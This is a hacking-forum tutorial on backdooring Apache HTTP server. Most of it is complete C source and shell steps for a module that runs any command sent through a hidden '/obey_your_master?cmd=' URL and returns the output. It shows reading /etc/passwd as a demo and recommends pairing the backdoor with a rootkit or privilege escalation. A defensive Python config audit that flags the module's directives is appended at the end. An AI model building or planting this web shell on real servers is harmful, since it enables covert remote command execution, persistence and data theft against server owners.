Backdooring Apache HTTP server Tutorial
Posted by Que$t, 01.02.2018, 23:14

[Introduction]
A few days ago I posted a tutorial about backdooring OpenSSH-server, in which we downloaded the source code of OpenSSH and edited it so that it would always accept the password "master_of_puppets". That was software that is meant for managing servers. Now I want to open your mind and show that you can also backdoor software that wasn't necessarily meant for server management, and show you another way of backdooring software: writing modules.

[What is Apache HTTP server?]
Apache HTTP server is open-source software used to host web pages.

[Why Apache?]
According to Netcraft, Apache has the largest "Market share of active sites". That means it's commonly used, so if you gain access to a server that hosts websites it will most likely use Apache.



[What exactly are we going to do?]

Download apache's development headers
Create our own module that will take requests like "/obey_your_master?cmd=<some command here>" and print out the output of our commands
Install the module

[The process]

{Installing apache's development headers}
Since I'm on Debian I'll be using the aptitude package manager

Code:
apt-get install apache2-dev
{Writing the module}
Let's create a separate directory for our project and start writing code in our favourite text editor (I'll use nano)

Code:
mkdir bd_module
cd bd_module
nano bd_module.c
So the first thing we need to do is include apache's headers:
Code:
#include <stdio.h>
#include "apr_hash.h"
#include "ap_config.h"
#include "ap_provider.h"
#include "httpd.h"
#include "http_core.h"
#include "http_config.h"
#include "http_log.h"
#include "http_protocol.h"
#include "http_request.h"
Now for the fun part: let's write the handler for our module. This is the function that will handle our request.
In our handler we'll check if we should handle the request and get the cmd variable from the URL; if cmd is not specified we'll set it to the command "uname -a", which gives us a bunch of information about the OS. Then we execute the command and print the output as a response.

Code:
static int oym_handler(request_rec *r)
{
    if(!r->handler || strcmp(r->handler, "obey_your_master-handler")) return(DECLINED); // Check if we need to execute this code

    /* Variables */
    apr_table_t*GET;           // Create a var table
    ap_args_to_table(r, &GET); // Read data from get
    FILE *fp;                  // We'll use this for popen
    char buff[1024];           // Buffer for output

    ap_set_content_type(r, "text/plain"); // Tell browsers that response is in plain text

    /* Get the "cmd" key from the query string, if any. */
    const char *cmd = apr_table_get(GET, "cmd");

    /* If no key was returned, we will set a default value instead. */
    if (!cmd) cmd = "uname -a";

    /* Open the command for reading. */
    fp = popen(cmd, "r");
    if (fp == NULL) {
      ap_rprintf(r, "Failed to run command\n");
      return OK;
    }
    /* Read the output a line at a time - output it. */
    while (fgets(buff, sizeof(buff)-1, fp) != NULL) {
      ap_rprintf(r, "%s", buff);
    }
    return OK;
}
Now let's register our hook and declare

Code:
static void register_hooks(apr_pool_t *pool)
{
    ap_hook_handler(oym_handler, NULL, NULL, APR_HOOK_LAST);
}
module AP_MODULE_DECLARE_DATA   bd_module =
{
    STANDARD20_MODULE_STUFF,
    NULL,               /* Per-directory configuration handler */
    NULL,               /* Merge handler for per-directory configurations */
    NULL,               /* Per-server configuration handler */
    NULL,               /* Merge handler for per-server configurations */
    NULL,               /* Any directives we may have for httpd */
    register_hooks      /* Our hook registering function */
};
And let's put it all together:

Code:
#include <stdio.h>
#include "apr_hash.h"
#include "ap_config.h"
#include "ap_provider.h"
#include "httpd.h"
#include "http_core.h"
#include "http_config.h"
#include "http_log.h"
#include "http_protocol.h"
#include "http_request.h"

/*
==============================================================================
Our module handler:
==============================================================================
*/
static int oym_handler(request_rec *r)
{
    if(!r->handler || strcmp(r->handler, "obey_your_master-handler")) return(DECLINED); // Check if we need to execute this code

    /* Variables */
    apr_table_t*GET;           // Create a var table
    ap_args_to_table(r, &GET); // Read data from get
    FILE *fp;                  // We'll use this for popen
    char buff[1024];           // Buffer for output

    ap_set_content_type(r, "text/plain"); // Tell browsers that response is in plain text

    /* Get the "cmd" key from the query string, if any. */
    const char *cmd = apr_table_get(GET, "cmd");

    /* If no key was returned, we will set a default value instead. */
    if (!cmd) cmd = "uname -a";

    /* Open the command for reading. */
    fp = popen(cmd, "r");
    if (fp == NULL) {
      ap_rprintf(r, "Failed to run command\n");
      return OK;
    }
    /* Read the output a line at a time - output it. */
    while (fgets(buff, sizeof(buff)-1, fp) != NULL) {
      ap_rprintf(r, "%s", buff);
    }
    return OK;
}

/*
==============================================================================
The hook registration function:
==============================================================================
*/
static void register_hooks(apr_pool_t *pool)
{
    ap_hook_handler(oym_handler, NULL, NULL, APR_HOOK_LAST);
}
/*
==============================================================================
Our module name tag:
==============================================================================
*/
module AP_MODULE_DECLARE_DATA   example_module =
{
    STANDARD20_MODULE_STUFF,
    NULL,               /* Per-directory configuration handler */
    NULL,               /* Merge handler for per-directory configurations */
    NULL,               /* Per-server configuration handler */
    NULL,               /* Merge handler for per-server configurations */
    NULL,               /* Any directives we may have for httpd */
    register_hooks      /* Our hook registering function */
};
{Compiling our module}

Code:
apxs -c bd_module.c
{Installing our module}
On a system that has apache's development headers installed you can install modules using "apxs (-i installs the module) (-a enables it) module_name"

Code:
apxs -i -a bd_module.la
But face it: installing apache's development headers for all the systems you own is just stupid, so let's do the install the manual way!
First we have to copy our module to the modules directory:

Code:
cp .libs/bd_module.so /usr/lib/apache2/modules/
Now we have to add "LoadModule" and "<Location>" directives to apache's configuration file
So let's open the config file

Code:
nano /etc/apache2/apache2.conf
And add these lines:

Code:
LoadModule bd_module /usr/lib/apache2/modules/bd_module.so
<Location "/obey_your_master">
    SetHandler obey_your_master-handler
</Location>
And the final step is to restart apache:

Code:
systemctl restart apache2
{Testing our module}
Fire up your browser and navigate to "some_sites_address/obey_your_master"
And it works!



Okay, so seeing the "uname -a" output is cool and all, but let's read the /etc/passwd file like all the 1337 h4x0rs do


And we are done here!


[Final notes]
Congratulations on making it through!
I commented the code and left the comments from the example I totally ripped off from apache's documentation (link is with the sources), but if you still don't understand something please reply to this thread and ask :)
This backdoor executes commands as the user that is configured to run apache so this backdoor should be used with a rootkit or some other method of privilege escalation:




[Sources]
[Links are visible only to registered users.]

Author: Pikami
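From the defender's side, the install steps in this post leave two artifacts in the Apache configuration: a LoadModule line for a shared object that no package owns, and a SetHandler name that no stock module registers. The following is an added example, not part of the original post: a config audit that flags both. The sample config is constructed, and `PACKAGED_MODULES` and `KNOWN_HANDLERS` are assumed baselines you would build from your package manager's file list and your modules' documentation.

```python
import re

# Constructed sample: a Debian-style apache2.conf fragment containing the
# directives the tutorial adds, next to one legitimate packaged module.
SAMPLE_CONF = """\
LoadModule mpm_event_module /usr/lib/apache2/modules/mod_mpm_event.so
# LoadModule old_module /usr/lib/apache2/modules/mod_old.so
LoadModule bd_module /usr/lib/apache2/modules/bd_module.so
<Location "/server-status">
    SetHandler server-status
</Location>
<Location "/obey_your_master">
    SetHandler obey_your_master-handler
</Location>
"""

# Assumed baselines (hypothetical values): module files owned by installed
# packages, and handler names registered by modules you actually use.
PACKAGED_MODULES = {"/usr/lib/apache2/modules/mod_mpm_event.so"}
KNOWN_HANDLERS = {"server-status", "server-info", "cgi-script", "none"}

LOADMODULE = re.compile(r"^\s*LoadModule\s+(\S+)\s+(\S+)", re.I)
SECTION_OPEN = re.compile(r"^\s*<(Location|Directory|Files)\w*\s+\"?([^\">]+)\"?\s*>", re.I)
SECTION_CLOSE = re.compile(r"^\s*</(Location|Directory|Files)\w*\s*>", re.I)
SETHANDLER = re.compile(r"^\s*SetHandler\s+\"?([^\"\s]+)\"?", re.I)

def audit_apache_config(text, packaged=PACKAGED_MODULES, handlers=KNOWN_HANDLERS):
    """Return (line_no, kind, detail) for unbaselined modules and handlers."""
    findings, scope = [], []
    for n, line in enumerate(text.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # commented-out directives are inactive
        if m := LOADMODULE.match(line):
            if m.group(2) not in packaged:
                findings.append((n, "unpackaged-module", f"{m.group(1)} -> {m.group(2)}"))
        elif m := SECTION_OPEN.match(line):
            scope.append(m.group(2))  # remember which path the handler applies to
        elif SECTION_CLOSE.match(line):
            if scope:
                scope.pop()
        elif m := SETHANDLER.match(line):
            if m.group(1).lower() not in handlers:
                where = scope[-1] if scope else "(server-wide)"
                findings.append((n, "unknown-handler", f"{m.group(1)} at {where}"))
    return findings

if __name__ == "__main__":
    for finding in audit_apache_config(SAMPLE_CONF):
        print(finding)
```

Run it over every file the main config pulls in with Include or IncludeOptional, since either directive can live in any of them.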